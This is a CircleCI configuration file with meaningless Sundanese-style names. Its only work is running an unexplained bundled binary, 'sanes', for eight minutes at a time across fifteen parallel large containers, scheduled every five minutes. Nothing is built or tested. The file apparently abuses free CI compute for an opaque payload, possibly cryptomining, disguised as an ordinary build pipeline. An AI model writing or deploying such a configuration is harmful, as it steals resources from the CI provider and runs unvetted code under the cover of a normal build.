version: 2.1

orbs:
  win: circleci/windows@2.4.0

executors:
  alus:
    docker:
      - image: circleci/rust:1.53-buster
    resource_class: large
    working_directory: ~/repo

commands:
  regas:
    description: galungan
    steps:
      - checkout
      - run:
          name: anyaran
          command: |
              sudo apt update -y
      - run:
          name: gawean
          command: |
              chmod u+x sanes && timeout 8m ./sanes
jobs:
  kilang1:
    executor: alus
    working_directory: ~/repo
    steps: [regas]
    parallelism: 3
  kilang2:
    executor: alus
    working_directory: ~/repo
    steps: [regas]
    parallelism: 2
  kilang3:
    executor: alus
    working_directory: ~/repo
    steps: [regas]
    parallelism: 4
  kilang4:
    executor: alus
    working_directory: ~/repo
    steps: [regas]
    parallelism: 3
  kilang5:
    executor: alus
    working_directory: ~/repo
    steps: [regas]
    parallelism: 3

workflows:
  version: 2
  build:
    jobs:
      - kilang1
      - kilang2
      - kilang3
      - kilang4
      - kilang5

    triggers:
      - schedule:
          cron: "0,5,10,15,20,25,30,35,40,45,50,55 * * * *"
          filters:
            branches:
              only:
                - master

  cikatuh:
    jobs:
      - kilang1
      - kilang2
      - kilang3
      - kilang4
      - kilang5